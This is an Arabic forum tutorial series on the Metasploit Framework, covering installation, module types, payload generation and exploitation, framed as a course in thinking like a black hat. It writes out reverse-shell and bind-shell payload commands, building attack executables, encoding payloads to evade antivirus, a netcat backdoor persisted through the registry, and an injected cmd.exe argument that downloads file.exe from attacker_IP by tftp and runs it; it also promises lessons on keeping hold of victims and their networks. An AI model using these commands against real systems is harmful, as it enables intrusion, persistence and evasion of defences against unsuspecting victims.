دورة كاملة مع دروس عن الميتا سبلوت

[DR.X]

السلام عليكم ورحمه الله وبركاته


تثبيت الميتاسبلوت


[]

[]

غير 3 الى e

طبعا ما انصح استخدامها بالوندوز , لانها بالليونكس افضل

ذكرت في المقدمه بعض الادوات موجوده بكلا النظامين لكن على النظام الفلاني اسرع وافضل

والميتاسبلويت على الليونكس اسرع وافضل .

الحل الانسب لمستخدمي الوندوز استخدم برنامج vmware واشتغل على النظامين

الرابط : []

اما عن تنصيبها بالليونكس

توزيعه ابنتو

[]

3=e

تثبيتها على توزيعات اخرى

[]

3=e

رابط التحميل

[]

3=e

ملاحظه تأكد من استخدامك لحساب الادمن حين تنصيب الميتاسبلويت على الوندوز وايضا تأكد

من تشغيلها بأستخدام حساب الادمن


ناتي الى الدروس



مقدمة ووتوضيحات
السلام عليكم ورحمه الله وبركاته


[]

اليوم راح نأخذ درس مهم جدآ , توضيحات ومقدمه .

الميتاسبلويت تم اصدارها عام 2003 من قبل HD moore

بدايتها كانت لا بأس بها لكن مع مرور 5 سنوات او 6 , لاحظنا

تطور ملحوظ , قبل كانت القليل من الثغرات وايضا بعض payload

لكن مع الوقت الان نلاحظ المئات من الثغرات و العشرات من payload

العديد من المميزات , وايضا تستخدم للفحص , يعني صارت اداه متكامله

والان اصبحت من الادوات اللتي يتطلب وجودها في جهاز اي شخص مهتم بالحمايه والاختراق .

كما ذكرت الميتاسبلويت اداه وهذا يعني اذا اتقنتها لا يعني احترافك

لان الاختراق بشكل عام لا يقتصر بأداه واحد فمن الممكن استخدام

اكثر من اداه ليتم الاختراق .


الكثير يسأل يقول في الاختراق استخدم Windows or Linux

Windowsvs. Linux

اي نظام اختار للاختراق ؟!

الجواب: صح !

وش تعني بصح !!!

انا قلت صح , بمعنى صح عليك اذا استخدمت النظامين بالاختراق مع بعض !

في ادوات بالوندوز لكن ليست موجوده بالليونكس والعكس

صحيح , لكن فيه ادوات موجوده بالنظامين , لكن في النظام الفلاني الاداه اسرع !

لذلك استعمل VMware , لتملك تحكم كامل .

ماذا عن Mac , نظام الماك نظام جيد للاختراق لكن تحتاج الوندوز والليونكس

بمعنى اخر لا تحصر نفسك بنظام معين ,

المهم هو الاختراق , انت المستخدم , كل اللي تملكه مجرد اداه , وندوز ,ليونكس , ميتاسبلويت , كور امباكت , او اي شيء اخر جميعها ادوات .

توضيح صغير الدوره مقامه على معرفتك السابقه للـ للفحص و جمع المعلومات , بمعنى اخر

انت تعرف ايش تعمل قبل تبدا الهجوم , لو انك تعرف تشفر وتعرف البايزون وتعرف التبليغ

ما يعني انك هاكر , انا لو قلت لطفل بعمر 10 او 13 سنه وشرحت كيف يعمل سيرفر كيف يخترق

وكلها بالبايزون يعني واجهة رسوميه بعد اسبوع يقول انا هآكر ولو تسأله عن البورت 21 قال ما ادري .

لذلك راجع نفسك وتعلم كيف تجمع المعلومات وتفحص والضحيه وتعرف ماهي الخدمات الموجوده على الجهاز المستهدف وتتعلم تستخدم كل اداه لافادتك .

لاحظت بجميع المنتديات , ((( الاختراق كالمحترفين باستخدام الميتاسبلويت ))) , او من هذا القبيل


طبعا الميتاسبلويت اداه قويه لكن ما اقدر اقول انها للمحترفين فقط ,, انا شخصيا استخدم الميتاسبلويت

لكن مش محترف و ولا وصلت لاحتراف حتى المستوى المتوسط لم اصل له .

جميع اللي تعلمته اشياء بسيطه وراح تتغير بعد كم سنه واصير ما اعرف شيء

بمعنى اخر , يجب عليك كل اسبوع مواكبه اخر الاخبار وتتعلم كل شيء جديد , لان عالم الهاكر متطور بشكل غير طبيعي .

الخلاصه من الجزئيه هذه , هو اذا كنت تخترق بالبايزون وتخترق بالجني الازرق ولا تعرف تستخدم nmap , nikto
nessus او من ادوات الفحص الاخرى

لا تتابع الدوره لانك ما راح تستفيد , نأخذ مثال مع فارق التشبيه , الان لو تعلمت اشعال نار لكن ما تعلمت كيف تحطب
هل راح يفيدك تعلمك لاشعال النار اكيد لا , لذلك راجع نفسك من جديد .

على العموم انا قلت بعض التوضيحات اللي تفيدك بالدوره الان نروح للدوره

الدوره راح تتكلم عن exploitation and post-exploitation وايضا عن scan بشكل عام

بمعنى اصح نتكلم عن الفحص لـ استغلال الثغرات ومن ثم الاختراق وايضا ما بعد الاختراق

راح نتكلم عن كيفه عمل هجمات مختلفه , وايضا كيف نخترق جهاز محصن بالهندسه الاجتماعيه

وايضا راح نتكلم عن كيفيه العوده للضحيه , وكيفيه ابقائه اطول مده ,

راح نتكلم كيفيه اختراق شبكه ضحيتنا والاستيلاء عليها لضمان بقائنا

طبعا المواضيع قابله للزياده و بأمكان اي شخص مراسلتي لوضع اي درس , المهم هو افادة الاعضاء


اسأله متوقعه :

1- اذا تعلمت الميتاسبلويت , هل استطيع اخترق اي شخص ؟

لا والف لا , لكن راح توسع المعرفه عندك
2- هل دورتك تعليميه للاختراق ؟

نعم , لكن بشكل اخر هو تعليميه لحماية جهازك , قبل ما تصير white hat hacker لازم تصير black hat hacker

من المهم انك تعرف كيف يفكر البلاك هات , لحماية نفسك , لذلك الدوره هذي راح نضعك على شكل البلاك هات

لكن للحمايه وليست للاذيه .





نتكلم الميتاسبلويت واساسياته وملفاته

البعض منآ يعرف الميتاسبلويت لكن ما يعرف ولا ملف بداخله

ولا يعرف فائدته , لذلك اليوم راح نشرح الملفات وبعض المفاهيم .

كما ذكرت بالمقدمه , النظام لا يهم , المهم هو المستخدم , لكن بعض الادوات تكون افضل بالنظام الفلاني .

شخصيا ارى الميتاسبلويت افضل على الليونكس , لكن لا مانع استخدام الوندوز .




كود PHP:
root@silv3r00t-hacker:~#cd /pentest/exploits/framework3


نستعرض الملفات عن طريق الامر



كود PHP:
ls



[]

راح نشرح شرح سريع للملفات الموجوده ,

data

موجود بهذا الملف ملفات DLLs ويستخدمها بعض payloads



tools

يوجد به ادوات مهمه وقويه

plugins

يوجد به ادوات مثل db_autopwn وغيرها

scripts

موجود به سكربت meterpreter وغيره

lib

يوجد به ملفات الروبي وبعض الملفات التي يستخدمها الـ m3tasploit

docum entation

ملفات للقراءه

external

موجود به بعض الكود المصدري لبعض الـ payload

modules

موجود به جميع الاشياء المهمه
1- exploits
payloads -2
encoders -3
nops -4
auxiliary -5


________

نروح للمهم

exploits

يقصد به الثغرات الموجوده بالميتاسبلويت وله اكثر من نوع ويدعم العديد من البرتوكولات

HTTP,SSH,SMTP,FTP,TFTP,SMB,TCP,UDP etc

استغلال الثغرات تكون
remote -1
local -2
user interaction -3

remote : تتطلب الـ ip فقط والخدمه شغاله

مثل ثغره SMB

local : تتطلب البرنامج المصاب بالثغره ولا تتطلب Ip الضحيه

user interaction : الثغرات بالمتصفح , click والجهاز مخترق

مثل ثغرات المتصفح في الميتاسبلويت

نروح للـ payload

بالمختصر كود يُسَتغل اذا الثغره اشتغلت بالوجه الصحيح

استغلاله يمر بأربع عمليات
1- المهاجم يجهز البايلود المناسب
2- وضع جميع الخيارات "البورت وهكذا "
3- ارسال البايلود مع الاستغلال
4-تشغيل البايلود في جهاز الضحيه

طبعا قوه الميتاسبلويت تكمن في التحكم والبساطه بأستخدام الـ payloads , تعطيك العديد من الخيارات وايضا بكتابة استغلال الثغرات .

وهي سهله البناء نوعا مآ شوفو البايلود adduser كيف سهولته وبساطته

[]

payload ينقسم الى ثلاثه اقسام

1- inline or single
stager -2
stage -3
بعض الاشخاص يختار inline payload وهو ما يدري ما هو فجأه يشوف الثغره ما اشتغلت

وتلقاه مجربها على جهازه الاخر ويعرف ان الثغره شغاله لكن ايش السبب ,,

انا اقولك , السبب ان single payload يرسل مع الاستغلال فأذا كانت الثغره تتطلب مساحه معينه من shellcode

وكان الـ payload المختار من قبل المهاجم اكبر من المساحه فيصير الاستغلال فالصو


نروح للثاني واللي هو مميز بشكل مو طبيعي لان مبدأ عمله , ارسال stub يقوم بحجز مكان في الذاكره

ومن ثم يقوم بتحميل البايلود كاملا ومن ثم تشغيله .

الاخير stage شبيه بـ inline لكن متطور شوي

ملاحظه: stager ممكن يعمل على هيئه stage


auxiliary

بأختصار هي ثغرات واداوات مجمعه لكن ماتستخدم payload

يتم الفحص عن طريقها واستخراج معلومات مهمه ,,

وتستعمل في بعض الهجمات في الوايرلس ويضا ثغرات DOS

encoders

هذي الكل يعرفها تستخدم لتشفير البايلود وتخطي IDS وايضا AV

IDS: هو برنامج أو جهاز مصمم للكشف عن محاولات الاختراق

او بعض الاحداث المريبه .


nops

مفيده لمن يكتشف ثغرات buffer overflow لانه ببساطه يساعد بعض المرات الشخص لايجاد عنوان العوده .



ادوات الميتاسبلوت
اكتشاف الثغرات واستغلالها .

وذلك لان اغلبيتها تساعدك بأستغلال الثغرات ووضع اهداف جديده

مثلا , لدينا ثغره تشتغل على Windows xp sp1 , بأستخدام msfpescan

بالامكان جعل الثغره تشتغل على Windows XP SP2 & SP1

وذلك بالعمل اليدوي .

طبعا هذه تستلزم خبره لاكتشاف الثغرات , لذلك دائما مشروع الميتاسبلويت مهم لمكتشفي الثغرات من الدرجه الاولى

والسبب الاول سهوله كتابة الثغرات وقوه التحكم في payload


مثلا شوفوا هالثغره كم سطر + البساطه

[]


ندخل على مسار الميتاسبلويت ونستعرض الملفات

[]


msfpescan -1
msfelfscan -2
msfmachscan -3

جميعها تقوم بفحص الملفات الثنائيه (binary)

بأمكانه ايجاد CALLs, JMPs, or POP/POP/RET instruction sets

طبعا هي مفيده لتسهيل كتابه استغلال الثغرات .


لكن ما الفرق بينهم

1- msfpescan : يستخدم لفحص ملفات DLLs او المكتبات المشتركه او exe لأيجاد عناوين العوده وما ذكر من قبل .

2- msfelfscan : لفحص ملفات التطبيقيه في الليونكس والتي هي ملفاتها elf

msfmachscan -3 : لفحص ملفات التطبيقيه في الماك .

نذهب الى الاداه msfopcode

msfopcode
وهي ما يقصد بها operation code وتعني رمز العمليه

تعريفه (حسب معرفتي) : هو جزء من اوامر لغه الاسمبلي مثال "MOV"

يحدد العمليه التي ستنفذ .

msfopcode متصل مع قاعده البيانات التي تحوي على رموز العمليات بموقع الميتاسبلويت , الاداه لا تشتغل لكن سيحدثونها

وترجع عما قريب
[]

غير 3 = e

طبعا من حسن الحظ انني كتبت موضوع قبل سنه واكثر على ما اظن

يتكلم عن كيفيه استخدام رمز العمليه لجعل الثغره تشتغل

ومن حسن الحظ كان الشرح فديو ومرفوع على مساحه خاصه بي

شاهد الفديو على اليوتوب ,, درجه الصفاوه ضعيفه

قبل المشاهده



راح نلاحظ الثغره ما تشتغل , لكن مع البحث في قاعده بيانات الميتاسبلويت راح تشتغل على الثغره ,

صاحب الثغره سهل علينا الامر وكتب رمز العمليه jmp esi عادتا الشغل يكون يدوي .

البعض راح يستغرب كيف عرفت ان الجهاز Windows XP sp 1 or sp 2

انا فحصت الهدف بتاعي بـ nmap واتضح ان الجهاز يشتغل على Win xp اما sp 1 or sp 2

الثغره تشتغل على sp 1 وحين تم استغلالها لم يحدث شيء , بمعنى ان نظام الهدف Win xp sp2
ولاحظوا كيف كتبته بالعكس , طبعا كتبته بالعكس لانها تدخل في عالم الاسمبلي []

الثغره : []

الجانب الجيد ان الميتاسبلويت مفتوح المصدر , لذلك بأمكانك التعديل على الثغرات التي بداخله .




شاهده على HQ


خارج الايطار : الله ايام الستايل القديم لموقع الميتاسبلويت لكن الفديو كوم وبتهوفن

كوم , اتوقع اني فصلت علي بتهوفن ذاك اليوم


انتهينا من ثلاثه ادوات مهمه لمن اختصاصه ايجاد الثغرات واستغلالها

نذهب الى باقي الادوات .

1- msfrpcd
msfrpc -2

الاول يعمل خادم لتشغيل الميتاسبلويت اما الثاني العميل , طبعا يستخدم برتوكول XMLRPC

انا صراحه ما انصح استعمالها لانها مثل الاكسسوارات :-)

msfd عمل سيرفر ليتم الاتصال به وتشغيل الميتاسبلويت

لاحظو بالصوره دخلت على msfconsole عن طريق اداه النت كات

[]


كود PHP:
root@silv3r00t-hacker:/pentest/exploits/framework3# ./msfd -h

Usage: msfd <options>

OPTIONS:

-A <opt> Specify list of hosts allowed to connect
-D <opt> Specify list of hosts not allowed to connect
-a <opt> Bind to this IP address instead of loopback
-f Run the daemon in the foreground
-h Help banner
-p <opt> Bind to this port instead of 55554
-s Use SSL


A
السماح للايبيات التاليه .

B
حظر الايبيات التاليه .

a
وضع الاي بي الخاص بك بدل من loopback واللذي هو 127.0.0.1

f
تشغيل الخدمه لكن ليست بشكل خفي , بدون هذا الخيار الميتاسبلويت راح يشتغل لكن في البروسيس ولا راح يكون بيّن للمستخدم .

h

مساعده

p

وضع البورت الذي سيتصل العميل عن طريقه .


s

استخدام تشفير SSL

بقي الان 6 ادوات وهي
1- msfconsole
msfcli -2
msfpayload -3
msfgui -4
msfw eb -5
msfencoder -6
1- msfpayload

msfencode -2


msfpayload : اداه مهمه لعمل الـ shellcode

الجميل في الامر ان بأمكانك عمل نفس shellcode لكن بصيغ مختلفه

سواء ja va scrip t ,perl ,C ,exe,ruby, raw, VBA

طريقه عمله .


كود PHP:
./msfpayload payload var=val


payload = اسم البايلود

var =المتغيرات مثلا lport ويعني البورت الخاص بالمهاجم

كيف نعرف متغيرات الـ payload ؟

نعرفها عن طريق الامر


كود PHP:
./msfpayload windows/shell/reverse_tcp O


الصوره تتكلم .
[]


local port= lport
البورت الخاص بالمهاجم ,
local host = lhost
ip الخاص بالمهاجم

خذها قاعده بدون تفكير دائما اي البايلود يستخدم اتصال عكسي reverse يحتاج lhost,lport

bind_shell
الحصول على شل بأتصال مباشر

reverse_shell
الحصول على شل بأتصال عكسي

الان نعمل تطبيق .

كود PHP:
./msfpayload windows/shell/reverse_tcp lhost=192.168.1.3 C


[/QUOTE]

[]

الان راح نعمل ملفات exe للاختراق بأستخدام msfpayload ,

البعض يتسائل يقول لماذا استخدم msfpayload لعمل ملفات exe وانا عندي shell access

صحيح عندك شل لكن الشل هذا حصلته عن طريق ثغره خارج الميتاسبلويت , الثغره تطلب مساحه معينه من الـ shellcode صغيره بحيث ما تقبل meterpreter , vncinject

طبعا الان ما فيه الا حل واحد وهو تحميل meterpreter , بكل تأكيد راح يكون exe

كيف نعمله على صيغه exe , بأستخدام mfspayload .

مثال لعمل exe

كود PHP:
./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.3 X > reverse.exe



طريقه التنصت للاتصال

./
كود PHP:
msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.3 E


msfcli راح اشرحها بدرس القادم .


مثال اخر

كود PHP:
./msfpayload windows/shell_bind_tcp LPORT=4444 X > listen.exe


الان راح نستخدم netcat

nc -vn 192.168.1.2 4444

~~~~~~~~~~~~~~~~

msfencode : اداه تستخدم لتشفير shellcode لتخطي IDS او AV



كود PHP:
Usage: ./msfencode <options>

OPTIONS:

-a <opt> The architecture to encode as
-b <opt> The list of characters to avoid: '\x00\xff'
-c <opt> The number of times to encode the data
-e <opt> The encoder to use
-h Help banner
-i <opt> Encode the contents of the supplied file path
-l List available encoders
-m <opt> Specifies an additional module search path
-n Dump encoder information
-o <opt> The output file
-p <opt> The platform to encode for
-s <opt> The maximum size of the encoded data
-t <opt> The format to display the encoded buffer
-x <opt> Specify an alternate win32 executable template



الاداه واضحه جدا لكن راح تنشرح , والشرح راح يكون فديو

قبل مده انا وجدت فديو جميل جدا ويتكلم عن هذه الاداه وكيفيه تخطي

مضاد الفيروسات لمده 24 دقيقه والشرح على الوندوز .

[]


الان بقى الواجهات
1-msfconsole
msfcli -2
msfgui -3
msfwe b -4

وراح يتم التطرق لها بالدرس القادم .



قبل ما انتهي , راح اعمل اختبار سريع لـ أتأكد انك متابع الدروس معاي وفاهم جميع الدروس !

لماذا لم استخدم msfcli في هذا المثال , مع اني استطيع استخدامه ؟

كود PHP:
./msfpayload windows/shell_bind_tcp LPORT=4444 X > listen.exe


الان راح نستخدم netcat

nc -vn 192.168.1.2 4444

ولماذا > متعوب عليها

استخدمت الاداه msfcli ,واستخدامها الزامي بمعنى اخر ما تتخلى عنها الا اذا عملت نفس الشيء msfconsole وجميعا مثل بعض !



كود PHP:
./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.3 X > reverse.exe



طريقه التنصت للاتصال

./
كود PHP:
msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.3 E






1- msfconsole
msfcli -2
msfgui -3
msfw eb -4

msfconsole: هي الواجه المفضله لدي , اولا لانها تتعامل مع سطر الاوامر , ثانيا استخدام اوامر

الليونكس بداخلها , بمعنى اخر بأمكان الفحص والتعامل مع اوامر الليونكس وانت بداخلها .


msfcli : اداه قويه من ناحيه الفكره وسريعه ايضا , بأمكانك استغلال الثغره بدون الدخول الى

msfconsle , استغلال الثغره يتم بسطر واحد , على حسب اعتقادي الاداه هذه

وضعوها ليتم كتابه السكربتات وادواات تستخدم الميتاسبلويت مثل fasttrack


msfgui : الميتاسبلويت بواجه رسوميه ,, لكن لا انصح بها بتاتا اولا الواجهه بطيئه

ثانيا الواجهة ارى ان التعامل معها صعب وايضا ممل


msfwe b : واجهة رسوميه , لكن افضل من سابقتها , لا افضل استعمالها لانها بطيئه ايضا


راح اشرح msfconsole , msfcli لان بمعرفتهم تعرف كيفيه التعامل مع الاخريات .


1- msfconsole

راح اشرح الاوامر المهمه

1- show

الامر هذا يقصد به اعرض سواء payload encoder nops exploits auxiliary , options all


مثال :
show exploits
عرض الثغرات

show payloads
عرض payloads

show encoders

عرض encoders

show nops

عرض nops

show auxiliary

عرض auxiliary

show options

عرض الخيارات

2- use

بمعنى استخدم الثغره او auxiliary

مثال :

كود PHP:
use exploit/windows/smb/msdns_zone****


كود PHP:
use auxiliary/scanner/smb/version


البعض يتسائل كيف احفظ اسم الثغره كامل ؟

ما يحتاج كل الي عليك كتابه use ex ومن ثم اضغط زر Tab على الكيبورد وراح يكمل كل شيء

3- info

عرض معلومات الثغره

مثال :

كود PHP:
info exploit/windows/smb/msdns_zone****


او

كود PHP:
use exploit/windows/smb/msdns_zone****


ثم
info

set -4

بمعنى ضع للمتغير قيمه

مثال

set rhost 192.168.1.3
set payload windows/shell_bind_tcp

connect -5

مثل اداه النت كات

exploit and run -6

exploit تستخدم لتشغيل الثغرات

run يستخدم لتشغيل auxiliary


back -7

العوده للوراء

مثال :

كود PHP:
msf exploit(msdns_zone****) > back
msf >


بقيه الاوامر راح تكتشفها مع الاستخدام بأذن الله


نروح لطريقه استخدام الثغره

استخدامها سهل ما تتعدا خمس اوامر

كود PHP:
اسم الثغره use

show option

ليتم عرض المتغيرات

اسم المتغير set

exploit


بعض الخيارات المخفيه حين اختيار الثغره .

show advanced
show evasion

ما انصح بتغيير خياراتهم الا اذا كنت فاهم المطلوب لان من كل ثغره لثغره تختلف , وبعض المرات

الثغره ما تشتغل الا بعد تعديل بعض الخيارات طبعا هذا بناء على جهاز ضحيتك ,

show targets

عرض الاهداف التي تشتغل الثغره عليها


نروح للاداه الاخرى msfcli

نروح لكيفيه الاستخدام

استخدامها سهل جدا وعن طريق سطر واحد


كود PHP:
Usage: ./msfcli <exploit_****> <option=value> [mode]
================================================== ==

Mode Description
---- -----------
(H)elp Youre looking at it baby!
(S)ummary Show information about this module
(O)ptions Show available options for this module
(A)dvanced Show available advanced options for this module
(I)DS Evasion Show available ids evasion options for this module
(P)ayloads Show available payloads for this module
(T)argets Show available targets for this exploit module
(AC)tions Show available actions for this auxiliary module
(C)heck Run the check routine of the selected module
(E)xecute Execute the selected module


S = ملعومات الثغره

O = خيارات الثغره

ِE = تشغيل الثغره

P = عرض بايلود الخاصه

مثال لاستغلال ثغره

كود PHP:
./msfcli exploit/windows/*** payload=windows/meterpreter/** rhost=A.B.C.D lhost=1.1.1.1


بدال ما نكتب داخل msfconsole

كود PHP:
set rhost a.b.c.d

set payload windows/****


نضع
rhost=
payload=

هذا الشرح كمختصر بأمكانك التطبيق


انا عندي تطبيق قديم اسمه hacking the ip first guide مسويه قبل سنه

كانت عندي سلسله لكن طارت

تابع التطبيق , ومن ثم يأتي وقت السؤال

ملاحظه : اهم شيء التطبيق للثغره


بعد ما تابعنا الفديو جاء وقت السؤال لكن هذا السؤال لتشغيل المخ , وممكن تصير اكثر من اجابه صح

في الفديو وضعنا النت كات كباك دور ومن ثم سجلناه بالريجستري عشان كل مره يشغل الجهاز يتصل على اي بي المهاجم

انا الان بشبكه داخليه وتعرفون ان الشبكه الداخليه ممكن يتغير اي بي بتاعك حين تفصل الاتصال من المودم
ا
او بأي طريق اخرى , طيب حين تفصل ممكن واحد يأخذ اي بي بتاعك , بكل تأكيد راح يطير الضحيه

انا ما ابي اثبت الاي بي بتاعي داخل الشبكه , لذلك نحتاج اتصال مباشر بمعنى اخر انا اللي اتصل بالضحيه مش الضحيه اللي يريد يتصل بي

لكن المشكله ان اي شخص غيري يقدر يتصل بعد لان اتصال مباشر

استغلال الثغره اسهل مما تتصور .

بعد ما اخترنا الثغره عن طريق الامر use

بعد ما اخترنا الثغره نكتب show option




بعد ما نظرنا للمتغيرات

راح نجد RHOST

وتعني دائما اي بي الضحيه

ٌRPORT

وتعني دائما بورت الضحيه , غالبا ما انصح بتغييره الا اذا كانت الثغره تعمل على اكثر من بورت

بعدها نضع لكل المتغيرات قيمه .

كود PHP:
set rhost اي بي الضحيه


كود PHP:
set rport بورت الضحيه


بقي الان لنا payload


كود PHP:
set payload payload na me



نكتب

show options



ظهرت لنا خيارات جديده وهي خيارات payload

LHOST وتعني ip المهاجم ,

LPORT وتعني بورت المهاجم

كود PHP:
set lhost اي بي المهاجم


كود PHP:
set lport بورت المهاجم



ثم اخر شيء نكتب exploit

ونشغل الثغره

ما اتوقع ان في اداه استغلالها اسهل من هذا , حتى البايزون التعامل معه اصعب


1- نختار الثغره

كود PHP:
use windows/smb/smb



2- ننظر الى متطلبات الثغره

كود PHP:
show option



3- نضع القيم للمتغيرات

كود PHP:
set المتغير Abc


4- نختار payload


كود PHP:
set payload windows/meterpreter




5- نضع المتغيرات للـ payload

كود PHP:
set المتغير abc



6- نستغل الثغره

كود PHP:
exploit




استغلينا الثغره هل اخترقنا الضحيه ؟!

اذا قال عندك sessions open

عندك ضحيه , اذا ما قالها , يعني ما حصل شيء ,


طيب كيف نستغل الثغره ونعرف انها شغالها , عن طريق الفحص , افحص ضحيتك قبل الهجوم ,

وقبل تفحص ضحيتك , اجمع معلومات عنه .

عندك nmap nessus او amap , لا تهجم قبل تتأكد من ان البورت مفتوح وان النظام معروف

ممكن تخمن النظام عن طريق nmap ويعطيك النظام المتوقع , لكن اذا كان خدمه smb

شغاله , ففي هذه الحاله نقدر نعرف النظام 100 %

عن طريق الميتاسبلويت مثال :

كود PHP:
msf > use auxiliary/scanner/smb/version
msf auxiliary(version) > set rhosts 192.168.1.2
rhosts => 192.168.1.2
msf auxiliary(version) > run
[*] 192.168.1.2 is running Windows Vista Ultimate Service Pack 1 (********: Unknown) (****:BANDAR-PC) (domain:WORKGROUP)

msf auxiliary(version) >


اعطاني النظام والاسم والدومين


لكن خلونا نروح للـ nmap

كود PHP:
msf auxiliary(version) > nmap -PN 192.168.1.2 -p 445 -O[*] exec: nmap -PN 192.168.1.2 -p 445 -O


Starting Nmap 5.00 ( http://nmap.org ) at 2010-01-15 05:45 EST
Interesting ports on 192.168.1.2:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:1D:60:64:06:EC (Asustek Computer)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows Vista|2008
OS details: Microsoft Windows Vista SP0 or SP1 or Server 2008 SP1
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.62 seconds


اعطاني مثل ماتشوفون تخمينات ,


عرفنا كيف نختار الثغره اذا كانت ريموت ,

اذا كان الضحيه ما عنده بورت مفتوح ؟!

نروح لتغرات client-side attacks ,

80 % من النوعيه هذي ناجحه , واذا رجعت لهذه الثغرات راح تخترق , مثل تغرات المتصفح


طيب لو ما اشتغلت هذه الثغرات ,,

تأكد من الخيارات من جديد , تأكد انك وضعت جميع القيم للمتغيرات


خارج الايطار : شغل اداه tcpdump لتعرف ان ادواتك شغاله , مثلا لو استغلينا الثغره والميتاسبلويت توقف فجأه او صار اي شيء , راح تكون مراقب الترافيك وتعرف ,

صراحه انا صارت معي مشكله مع nmap فحص جهاز واخذت ساعه وربع وانا انتظر ,

nmap توقف فجأه وانا ما ادري , اخذت انتظر ثم شغلت tcpdump وعرفت ان الـ nmap

متوقف, لذلك من الافضل قبل تسوي اي هجوم شغل tcpdump لتعرف ان ادواتك شغاله على الوجه الصحيح


المهم نرجع لاهم الاسباب في فشل استغلال الثغرات

1- الضحيه لا يستخدم البرنامج المصاب

بعض المرات يكون البرنامج غير موجود وهذه ليست بالمشكله فهنالك العشرات من الثغرات النختلفه .

2- الجدار الناري يحجب الوصول الى البورت

بعض البورتات تكون محجوبه وبعضها لا , مثل تغرات SMB تستخدم اكثر من بورت

لذلك حاول تغير بين البورتات .

3- هنالك من يكشف الثغره ويقوم بحجبها مثل IPS

من الصعب التعامل مع هذه المشكله لكن الافضل هو التعامل مع evasion في الميتاسبلويت

ولا انصح المبتدأ التعامل معها

4- الضحيه ممكن يكون قابل للاستغلال الثغره لكن لم تستغل

هذه المشكله نادرا ما تحدث , وهي عندما تستغل الثغره , ممكن يصير شيء غير متوقع

وهي مثلا يصير له هانق "يهنق" او مثلا يعيد التشغيل

مره كنت اختبر ثغره جديده , الجهاز لي ما كان لأحد بمعنى اخر اختبر الثغره على جهازي

جهازي ما حدثته يعني الثغره لازم تشتغل , استغليت الثغره , وفجأه الجهاز وقف عن العمل لذلك

لذلك ممكن بعض المرات تواجهك هذه المشكله

5- الجهاز خلف nat

هذا اصبح معروف , جميع الاجهزه خلف نات , مافيه اي شخص الا ويستخدم مودم

لذلك يجب التأكد ان البورت مفتوح وايضا تأكد ان تستخدم اتصال عكسي .


1- ايضاح ان الميتاسبلويت الطريقه الوحيده

2- توضيح لاغلب الثغرات التي نستخدمها

3- شرح للثغرات التي لا تستخدم shellcode


نبدأ وعلى بركه الله ,,


اغلب الاشخاص يظن ان كلمه الاختراق مربوطه بالميتاسبلويت وهذا خطأ !

الميتاسبلويت اداه قويه لكن هنالك ثغرات ليست بالميتاسبلويت وبعض المرات تعتبر من 0-day


لذلك سأشرح شرح سريع للتعامل مع الثغرات خارج ايطار الميتاسبلويت !


1- ثغرات خارج الميتاسبلويت

نأخذ مثلا ثغره

[]

هذه الثغره في برنامج AOL والبرنامج مشهور []

على العموم افتح الثغره , راح تلاحظ ActiveX او حتى html , بعد الملاحظه راح نعرف ان الثغره تستغل

عن طريق المتصفح , بمعنى ادق الضحيه راح يتصفح هذه الصحفه ونستغل عن طريقها

victim ------------------------>attacker


victim ---------------------------------->attacker
......................---------------------------------->

نلاحظ ان اول السينارويو ,

1- الضحيه اتصل بالمهاجم
2- المهاجم ارسل الثغره وبنفس الوقت الضحيه شغل الثغره
3- حصلتا على اتصال عكسي

نستنج ان هذه الثغره من نوع client-side attack .

نذهب الى shellcode , كيفيه تغييره

دائما بأستغلال الثغره يكتب المكتشف shellcode = او ممكن يكتب الاسم غير لكن دائما تكتب على هذا الشكل .

لكن الـ shellcode في هذه الثغره كيف اكتبه , شكله غريب ؟!

shellcode في هذه الثغره مكتوب على الجافاسكربت وممكن تستخدم اداه msfpayload .


2- توضيح لاغلب الثغرات

الثغرات تنقسم الى قسمين اساسيين غير الاقسام في الدرس الثاني .

توضيح: القسمين هذا عام بمعنى مثال مع فارق التشبيه , الانسان يا مسلم يا كافر

اذا كان مسلم يكون مثلا سني او شيعي واذا كان كافر ممكن يكون يهودي نصراني .

المهم

A - ثغرات تكون تحت مظله server-side attacks

من اسمها

المهاجم يرسل الاستغلال مباشره للضحيه

attacker -----------------------> victim

ثم من بعدها يشغل الشل كود .

B - ثغرات تكون تحت مظله client-side attacks

وهذه العكس لان الضحيه يتصل بالمهاجم ومن ثم يتم الاستغلال

victim -----------------> attacker

ومن ثم يتم تشغيل الشل كود .


استغلال الثغرات تكون مكتوبه بلغات مختلفه perl ,python ,c , ruby etc

وغالبا كاتب الاستغلال يكتبها بالبدايه .. وايضا بأمكانك معرفتها بنفسك .


3- ثغرات لا تستخدم shellcode او بعض المشاكل التي تواجه الـ shellcode


[]

ننظر الى هذه الثغره مثلا ,

مكتشفه من الاخ , عبدالله..

المهم لو تابعنا الثغره مالها shellcode هل نعتبر ان الثغره غبيه اكيد لا .

بعض الثغرات تستعمل shellcode لكن حين نستخدم bindshell راح يحظره الجدار الناري


attacker --------------------X| victim


البعض يقول نستخدم reverseshell او اتصال عكسي , نستخدم لكن بعض المرات الجدار الناري يحظر الاتصال الخارج .

attacker------------> | X <-- victim

مافيه الا find socket shellcod وهذا له ايضا مشاكله الخاصه

بقى عندنا نستخدم code execution shellcode

الثغره اللي بالسابق تستعمل code execution لذلك راح نستخدم بعض الاوامر اللي تفيدنا بأختراق

الضحيه .

اولا الثغره تستخدم لتشغيل مثلا cmd.exe بمعنى اخر بأمكاننا التحكم بالاوامر


1- تحميل الملف ومن ثم تشغيله عن طريق tftp .

نقدر نحمل ملف ونشغله عن طريق tftp

مطلباته وجود tftp client على جهاز الضحيه وايضا tftp server على جهاز المهاجم

استعماله يكون مثلا


كود PHP:
arg1="c:\WINDOWS\system32\cmd.exe /c tftp -i attacker_IP GET file.exe && file.exe"



2- تحميل الملف ومن ثم تشغيله عن طريق ftp .

مطلباته يكون عند الضحيه ftp client

طريقه الاستخدام ftp -s:attacker.txt

مثال

